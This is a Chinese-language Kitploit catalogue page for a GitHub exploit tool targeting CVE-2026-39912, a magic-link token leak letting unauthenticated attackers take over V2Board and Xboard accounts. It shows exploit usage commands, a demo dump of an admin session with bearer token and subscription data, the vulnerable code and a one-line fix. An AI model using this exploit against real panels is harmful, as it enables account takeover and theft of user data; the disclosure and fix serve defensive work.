Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-39912 — Xboard / V2Board 未授权账户接管 - 魔法链接令牌泄露 (CVE-2026-39912) | Kitploit
工具/GitHubGitHub/chocapikk/cve-2026-39912
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试身份验证
GitHubchocapikk/cve-2026-39912

CVE-2026-39912

Xboard / V2Board 未授权账户接管 - 魔法链接令牌泄露 (CVE-2026-39912)

查看仓库
215个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

CVE-2026-39912 - Xboard / V2Board 未授权账户接管

loginWithMailLink 中的魔法链接令牌泄露

CVECVE-2026-39912
CVSS9.1 (严重)
CWECWE-201 (敏感信息嵌入已发送数据)
影响版本V2Board >= 1.6.1 至 1.7.4 / Xboard 所有版本至 0.1.9+
已修复尚未 (V2Board 自 2023 年 6 月起已停止维护)
披露日期2026-04-09
发现者Valentin Lobstein (Chocapikk)
报告文章chocapikk.com
修复PRV2Board #981 / Xboard #873

TL;DR

loginWithMailLink 端点将魔法登录链接直接返回在 HTTP 响应体中,而不是仅仅通过邮件发送。一个知道已注册邮箱的未认证攻击者可以通过两次 HTTP 请求接管任何账户——包括管理员。

受影响软件

  • V2Board - 开源代理协议管理面板 (8.7k 星标,已停止维护)
  • Xboard - V2Board 的分支 (4k+ 星标,正在积极维护)

两者都是广泛部署的 VPN/代理面板,主要在中国使用。ZoomEye 显示互联网上暴露了 7000+ 个实例。

利用条件

  • 必须在管理员设置中启用 login_with_mail_link_enable(默认未启用)
  • 一个有效的已注册邮箱地址

使用方法

root@kitploit:~
# 安装依赖
pip install requests

# 账户接管 + 数据导出
python3 exploit.py http://target:7001 [email protected]

# 将导出的数据保存到文件
python3 exploit.py http://target:7001 [email protected] -o dump.json

演示

root@kitploit:~
$ python3 exploit.py http://target:7001 [email protected]

 Xboard / V2Board - Unauth Account Takeover
 Magic Link Token Leak (CVE-2026-39912) | by Choc
 V2Board >= 1.6.1 | Xboard <= 0.1.9+
 45 min from git clone to is_admin: true

[INFO] Requesting magic link for [email protected]
[INFO] Leaked: http://target:7001/#/login?verify=267bdf61...&redirect=dashboard
[INFO] Authenticated (admin=True)
[INFO] User Info: OK
[INFO] Subscription: OK
[INFO] Active Sessions: OK
[INFO] Stats: OK

{
  "auth": {
    "auth_data": "Bearer qCU2d9hS...",
    "is_admin": true
  },
  "dump": {
    "User Info": {
      "email": "[email protected]",
      "uuid": "12fcb57d-e908-420e-a7aa-b5f7e7bd3695",
      ...
    },
    "Subscription": {
      "subscribe_url": "http://target:7001/s/324396af...",
      ...
    },
    "Active Sessions": [ ... ]
  }
}

漏洞原理

V2Board (app/Http/Controllers/Passport/AuthController.php):

root@kitploit:~
SendEmailJob::dispatch([...]);

return response([
    'data' => $link   // 令牌泄露给调用方
]);

Xboard (app/Services/Auth/MailLinkService.php):

root@kitploit:~
$this->sendMailLinkEmail($user, $link);

return [true, $link]; // 相同漏洞,继承自原分支

修复方法

root@kitploit:~
- return [true, $link];
+ return [true, true];

参考链接

  • V2Board - 漏洞代码 (第71行)
  • Xboard - 漏洞代码 (第49行)
  • 首次引入该漏洞的提交 (2022-06-27)
下载工具